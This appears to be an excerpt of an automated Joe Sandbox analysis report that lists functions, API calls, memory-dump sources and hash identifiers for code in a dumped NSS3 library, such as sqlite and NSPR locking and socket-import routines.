                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                                                                                                                                                                      • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                                                                                                                                                                      • API String ID: 2274617401-4033235608
                                                                                                                                                                                                                                                      • Opcode ID: 6616b7fd87b92775a9e3805ba21952d50fe098e7fd2d1a2228ebbce1734ed3cb
                                                                                                                                                                                                                                                      • Instruction ID: abdb078b6f1cb5ac802598a5a5fa0d5719041f84daac4afad17d0cb2abfc312a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6616b7fd87b92775a9e3805ba21952d50fe098e7fd2d1a2228ebbce1734ed3cb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78319973EC4951A7E7088E24AC01BA973617792318F1AC529D8246BE58DF71AC5283E2
                                                                                                                                                                                                                                                      Function 6C542D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_initialize.NSS3 ref: 6C542D9F
                                                                                                                                                                                                                                                        • Part of subcall function 6C3FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C45F9C9,?,6C45F4DA,6C45F9C9,?,?,6C42369A), ref: 6C3FCA7A
                                                                                                                                                                                                                                                        • Part of subcall function 6C3FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C3FCB26
                                                                                                                                                                                                                                                      • sqlite3_exec.NSS3(?,?,6C542F70,?,?), ref: 6C542DF9
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000), ref: 6C542E2C
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C542E3A
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C542E52
                                                                                                                                                                                                                                                      • sqlite3_mprintf.NSS3(6C5AAAF9,?), ref: 6C542E62
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C542E70
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C542E89
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C542EBB
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C542ECB
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000), ref: 6C542F3E
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C542F4C
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1957633107-0
                                                                                                                                                                                                                                                      • Opcode ID: 271e1b058088762db63921a3c4da6a44167d0bb3780bcfb92f7a3c8769ab178d
                                                                                                                                                                                                                                                      • Instruction ID: 2d4ba5462b342d39908cd4c385044ac24f691e5486a6b83711685dc5f1761bec
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 271e1b058088762db63921a3c4da6a44167d0bb3780bcfb92f7a3c8769ab178d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4619FB5E002159BEB00CFA8DC85BAEB7B1AF58348F158428DC55E7701E735E856CFA1
                                                                                                                                                                                                                                                      Function 6C487C70 Relevance: 18.1, APIs: 12, Instructions: 141COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2120,Function_00097E60,00000000,?,?,?,?,6C50067D,6C501C60,00000000), ref: 6C487C81
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F4C70: TlsGetValue.KERNEL32(?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4C97
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CB0
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CC9
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C487CA0
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C487CB4
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C487CCF
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C487D04
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C487D1B
                                                                                                                                                                                                                                                      • realloc.MOZGLUE(-00000050), ref: 6C487D82
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C487DF4
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C487E0E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2305085145-0
                                                                                                                                                                                                                                                      • Opcode ID: 69a72416769dc8239274cb2043758183e64b9b4e7dcff724383aa8ce74fd24d0
                                                                                                                                                                                                                                                      • Instruction ID: 5463acb8560592967cb40a37d0c4bf664bf96c12b4e201e520948492ddfff933
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 69a72416769dc8239274cb2043758183e64b9b4e7dcff724383aa8ce74fd24d0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8651F575B0A200DBDB01EF68CC54E6577F5FB42319F168129FD0487B22EB30E851CA99
                                                                                                                                                                                                                                                      Function 6C4D7870 Relevance: 18.1, APIs: 12, Instructions: 138stringmemorythreadCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(?,?,?,6C4D91C5), ref: 6C4D788F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C478298,?,?,?,6C46FCE5,?), ref: 6C4D07BF
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C4D07E6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D081B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D0825
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000,?,?,6C4D91C5), ref: 6C4D78BB
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6C4D91C5), ref: 6C4D78FA
                                                                                                                                                                                                                                                      • strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6C4D91C5), ref: 6C4D7930
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C4D91C5), ref: 6C4D7951
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4D7964
                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C4D797A
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C4D7988
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6C4D7998
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4D79A7
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6C4D91C5), ref: 6C4D79BB
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3(?,?,?,?,6C4D91C5), ref: 6C4D79CA
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Error$Alloc_HashLookupTablememcpy$ConstCurrentFindItem_ThreadZfreefreestrchrstrcmpstrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1862276529-0
                                                                                                                                                                                                                                                      • Opcode ID: 8fe294e77b7e5f8b582df8dd43d3464fd225205a1d73792af32ac44a99116ecf
                                                                                                                                                                                                                                                      • Instruction ID: 367f678168fe67a6680c86d7ad2236ae8eea98537c00b4dc20704b58f6d0490b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8fe294e77b7e5f8b582df8dd43d3464fd225205a1d73792af32ac44a99116ecf
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7141E1B1A082019BFB10EB658C55F6B7BA8AF40249F260078F818D7B41E721F848C7E2
                                                                                                                                                                                                                                                      Function 6C3F4C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4C97
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CB0
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CC9
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4D11
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4D2A
                                                                                                                                                                                                                                                      • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4D4A
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4D57
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4D97
                                                                                                                                                                                                                                                      • PR_Lock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4DBA
                                                                                                                                                                                                                                                      • PR_WaitCondVar.NSS3 ref: 6C3F4DD4
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4DE6
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4DEF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3388019835-0
                                                                                                                                                                                                                                                      • Opcode ID: 0e179037cf5a98cdaf7d4df863126fc5dd625a27a64363bf515a41e093b4bd1e
                                                                                                                                                                                                                                                      • Instruction ID: 2052eeb9d1768aaaa765d0733675a89cc7dedcc86daed1b2f777d25f2ce6f245
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e179037cf5a98cdaf7d4df863126fc5dd625a27a64363bf515a41e093b4bd1e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C94172B5A04725CFCB00AF78D984559B7B4BF05318F064A69E8589BB11E730E885CFD9
                                                                                                                                                                                                                                                      Function 6C498F70 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 152COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FAF
                                                                                                                                                                                                                                                      • PR_Now.NSS3(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FD1
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FFA
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C499013
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C499042
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C49905A
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C499073
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C4990EC
                                                                                                                                                                                                                                                        • Part of subcall function 6C460F00: PR_GetPageSize.NSS3(6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F1B
                                                                                                                                                                                                                                                        • Part of subcall function 6C460F00: PR_NewLogModule.NSS3(clock,6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F25
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C499111
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
                                                                                                                                                                                                                                                      • String ID: nXl
                                                                                                                                                                                                                                                      • API String ID: 2831689957-2538165799
                                                                                                                                                                                                                                                      • Opcode ID: c8e3a92b7501b32e93f93e3b073d089d6788a780e64dc8d56a4a4931f53d352c
                                                                                                                                                                                                                                                      • Instruction ID: b8925d8819e3b706d61aeec6b41e1ca8f1732d4138f28589eb0e175b0598854e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8e3a92b7501b32e93f93e3b073d089d6788a780e64dc8d56a4a4931f53d352c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD517A74A046248FDF00EF78C888E59BBF0BF4A318F065569DC499BB05EB31E885CB95
                                                                                                                                                                                                                                                      Function 6C587CD0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113threadstringCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C587CE0
                                                                                                                                                                                                                                                        • Part of subcall function 6C539BF0: TlsGetValue.KERNEL32(?,?,?,6C580A75), ref: 6C539C07
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C587D36
                                                                                                                                                                                                                                                      • PR_Realloc.NSS3(?,00000080), ref: 6C587D6D
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C587D8B
                                                                                                                                                                                                                                                      • PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6C587DC2
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C587DD8
                                                                                                                                                                                                                                                      • malloc.MOZGLUE(00000080), ref: 6C587DF8
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C587E06
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
                                                                                                                                                                                                                                                      • String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
                                                                                                                                                                                                                                                      • API String ID: 530461531-3274975309
                                                                                                                                                                                                                                                      • Opcode ID: d3050562fcd0ebb0cc78d85b1e7abb902b50b99e9c7d7125669b0829c451064f
                                                                                                                                                                                                                                                      • Instruction ID: f6354612a385c99da8c9a8ec2a00620b89f0394da6adc8833d0d5b9781249cd5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d3050562fcd0ebb0cc78d85b1e7abb902b50b99e9c7d7125669b0829c451064f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4241C3B1A022119FDB04CF29CC80D6A37B6FF84358B29496CF81A8BB51D731ED01CBA1
                                                                                                                                                                                                                                                      Function 6C587E20 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103filestringpipeCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C587E37
                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSPR_INHERIT_FDS), ref: 6C587E46
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: TlsGetValue.KERNEL32(00000040,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461267
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: EnterCriticalSection.KERNEL32(?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C46127C
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461291
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: PR_Unlock.NSS3(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C4612A0
                                                                                                                                                                                                                                                      • PR_sscanf.NSS3(00000001,%d:0x%lx,?,?), ref: 6C587EAF
                                                                                                                                                                                                                                                      • PR_ImportFile.NSS3(?), ref: 6C587ECF
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C587ED6
                                                                                                                                                                                                                                                      • PR_ImportTCPSocket.NSS3(?), ref: 6C587F01
                                                                                                                                                                                                                                                      • PR_ImportUDPSocket.NSS3(?,?), ref: 6C587F0B
                                                                                                                                                                                                                                                      • PR_ImportPipe.NSS3(?,?,?), ref: 6C587F15
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Import$Socket$CriticalCurrentEnterFilePipeR_sscanfSectionSecureThreadUnlockValuegetenvstrlen
                                                                                                                                                                                                                                                      • String ID: %d:0x%lx$NSPR_INHERIT_FDS
                                                                                                                                                                                                                                                      • API String ID: 2743735569-629032437
                                                                                                                                                                                                                                                      • Opcode ID: eda0c8cf40778648ae3510c23005af5d62f38d23fcf83ccc6233bd39a0db5c4b
                                                                                                                                                                                                                                                      • Instruction ID: dfebf59d2f48e88393d07e76bbcf7c94d7337ba7d5f12e8ba59f03f43e99b080
